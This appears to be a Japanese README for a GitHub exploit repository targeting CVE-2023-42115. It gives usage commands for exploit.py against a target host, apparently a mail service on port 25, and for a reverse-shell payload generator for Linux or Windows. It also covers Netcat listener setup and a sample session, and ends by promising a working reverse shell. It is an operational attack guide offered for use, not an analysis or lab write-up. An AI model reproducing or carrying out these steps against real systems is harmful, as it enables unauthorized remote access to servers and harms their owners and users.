
このリポジトリには2つのPythonスクリプトが含まれています:
exploit.py: CVE-2023-42115を悪用するためのスクリプト。generate_payload.py: リバースシェルペイロードを生成するためのスクリプト。スクリプトを実行する前に、システムにPython 3がインストールされていることを確認してください。
リポジトリのクローン:
git clone https://github.com/isotaka134/cve-2023-42115.git
cd cve-2023-42115
依存関係のインストール:
pipを使用して必要なPythonライブラリをインストールします。次のコマンドを実行して、requirements.txtにリストされているすべての必要な依存関係をインストールしてください:
pip install -r requirements.txt
exploit.py
このスクリプトはCVE-2023-42115の脆弱性を悪用します。
python exploit.py -t <target_ip> -p <target_port> [options]
オプション:
-t: ターゲットのIPアドレス。
-p: ターゲットサービスのポート。
例:
python exploit.py -t 192.168.1.10 -p 25 --mode SCAN
python exploit.py -t 192.168.1.10 -p 25 --mode EXPLOIT -f /path/to/payload.sh
generate_payload.py
このスクリプトはユーザー入力に基づいてリバースシェルペイロードを生成します。
python generate_payload.py
手順:
スクリプトは以下の情報を入力するよう求めます:
A. ペイロードタイプ ( linux または windows)
B. ローカルIP: リバース接続のためのIPアドレス
C. ローカルポート: リバース接続用 注意: ルーターの背後にいる場合やNATを使用している場合は、Netcatを実行しているデバイスに正しいポート転送を設定してください。
D. 出力ファイル名 (例: Linuxの場合はpayload.sh、Windowsの場合はpayload.ps1)
例:
python generate_payload.py
Payload Generator
Enter payload type (linux/windows): Linux
Enter local IP address: 127.0.0.1
Enter local port: 4444
Enter output file name (e.g., payload.sh or payload.ps1): Payload.sh
Payload saved to Payload.sh
リバースシェルを受け取るために、ローカルマシンにリスナーを設定する必要があります。これにはNetcat (nc)を使用できます。
nc -lvnp <YOUR_LOCAL_PORT>
nc -lvnp <YOUR_LOCAL_PORT>
これらの手順に従うことで、CVE-2023-42115を悪用するペイロードを作成して使用し、リバースシェル接続を受け取ることができるはずです。
改善の提案や貢献がある場合は、Issueを開くかプルリクエストを送信してください。
質問やサポートについては、以下までご連絡ください:
[email protected]